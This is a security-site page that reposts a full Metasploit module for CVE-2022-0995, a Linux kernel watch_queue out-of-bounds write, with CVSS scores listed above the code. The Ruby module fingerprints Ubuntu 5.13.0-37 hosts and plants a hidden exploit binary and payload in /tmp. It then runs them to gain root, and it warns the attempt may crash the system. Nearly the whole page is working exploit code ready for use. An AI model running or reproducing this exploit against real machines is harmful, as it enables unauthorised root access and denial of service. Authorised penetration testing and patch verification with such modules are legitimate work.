Watch Queue Out-Of-Bounds Write

2022.04.23
Credit: Jann Horn
Risk: Low
Local: No
Remote: Yes
CWE: CWE-787


CVSS Base Score: 6.6/10
Impact Subscore: 9.2/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: None
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Post::Linux::Kernel include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Watch Queue Out of Bounds Write', 'Description' => %q{ This module exploits a vulnerability in the Linux Kernel's watch_queue event notification system. It relies on a heap out-of-bounds write in kernel memory. The exploit may fail on the first attempt so multiple attempts may be needed. Note that the exploit can potentially cause a denial of service if multiple failed attemps occur, however this is unlikely. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jann Horn', # discovery and poc 'bonfee', # PoC 'bwatters-r7' # Aka @tychos_moose, Metasploit Module ], 'DisclosureDate' => '2022-03-14', 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Privileged' => true, 'References' => [ [ 'CVE', '2022-0995' ], [ 'URL', 'https://github.com/Bonfee/CVE-2022-0995' ], [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93ce93587d36493f2f86921fa79921b3cba63fbb' ], [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0995' ], [ 'PACKETSTORM', '166770' ], ], 'Targets' => [ [ 'Ubuntu Linux 5.13.0-37', {} ], ], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [ UNRELIABLE_SESSION ], # Not expected to get a shell every time due to heap spray sometimes not working. 'Stability' => [ CRASH_OS_DOWN ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] } ) ) register_options [ OptBool.new('DEBUG_SOURCE', [ false, 'Use source code with debug prints to help troubleshoot', false ]) ] register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def pull_version kernel_data = kernel_release version_array = kernel_data.split('-') if version_array.length < 3 print_error("Failed to parse the kernel version data: #{kernel_data}") return nil end vprint_status("Version array: #{version_array}") major_version = Rex::Version.new(version_array[0]) vprint_status("major_version: #{major_version}") minor_version = version_array[1].strip unless version_array[1].nil? vprint_status("minor_version: #{minor_version}") kernel_type = version_array[2].strip unless version_array[2].nil? return [major_version, minor_version, kernel_type] end def module_check # Vulnerable versions are under 5.17:rc8 # This module only has offsets for Ubuntu 5.13.0-37 if is_root? && !datastore['ForceExploit'] fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override.') end if datastore['DEBUG_SOURCE'] && datastore['COMPILE'] != 'True' fail_with(Failure::BadConfig, 'DEBUG_PRINT is only supported when COMPILE is set to True') end unless kernel_version =~ /[uU]buntu/ fail_with(Failure::NoTarget, "Unsupported Distro: '#{version}'") end arch = kernel_hardware unless arch.include?('x86_64') fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'") end version_info = pull_version if version_info.nil? fail_with(Failure::NoTarget, 'Failed to obtain kernel version') end major_version, minor_version, kernel_type = version_info vulnerable_version = Rex::Version.new('5.13.0') unless major_version == vulnerable_version && minor_version == '37' && kernel_type.include?('generic') fail_with(Failure::NoTarget, "No offsets for '#{kernel_release}'") end end def check # Vulnerable versions are under 5.17:rc8 # This module only has offsets for 5.13.0-37 vulnerable_version = Rex::Version.new('5.17.0') version_info = pull_version if version_info.nil? return CheckCode::Unknown('Failed to obtain kernel version') end major_version = version_info[0] if major_version <= vulnerable_version return CheckCode::Appears else return CheckCode::Safe("The target kernel version #{major_version} is later than the last known vulnerable version aka #{vulnerable_version}") end end def exploit module_check base_dir = datastore['WritableDir'].to_s unless writable?(base_dir) fail_with(Failure::BadConfig, "#{base_dir} is not writable") end executable_name = ".#{rand_text_alphanumeric(5..10)}" exploit_dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" exploit_path = "#{exploit_dir}/#{executable_name}" if file_exist?(exploit_dir) fail_with(Failure::BadConfig, 'Exploit dir already exists') end mkdir(exploit_dir) register_dir_for_cleanup(exploit_dir) # Upload exploit if live_compile? vprint_status('Live compiling exploit on system...') if datastore['DEBUG_SOURCE'] code = exploit_source('cve-2022-0995', 'cve-2022-0995_debug.c') else code = exploit_source('cve-2022-0995', 'cve-2022-0995.c') end upload_and_compile(exploit_path, code, '-no-pie -static') else vprint_status('Dropping pre-compiled exploit on system...') precompiled_binary = 'cve-2022-0995.x64.elf' vprint_status("Dropping pre-compiled exploit #{precompiled_binary} on system...") upload_and_chmodx(exploit_path, exploit_data('cve-2022-0995', precompiled_binary)) end register_file_for_cleanup(exploit_path) # Upload payload payload_path = "#{exploit_dir}/.#{rand_text_alphanumeric(5..10)}" upload_and_chmodx(payload_path, generate_payload_exe) # Launch exploit print_status('Launching exploit...') cmd_string = "#{exploit_path} #{payload_path}" vprint_status("Running: #{cmd_string}") begin output = cmd_exec(cmd_string) vprint_status(output) rescue Error => e elog('Caught timeout. Exploit may be taking longer or it may have failed.', error: e) print_error("Exploit failed: #{e}") print_error("Ensure deletion of #{exploit_path} and #{payload_path}") end end end


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top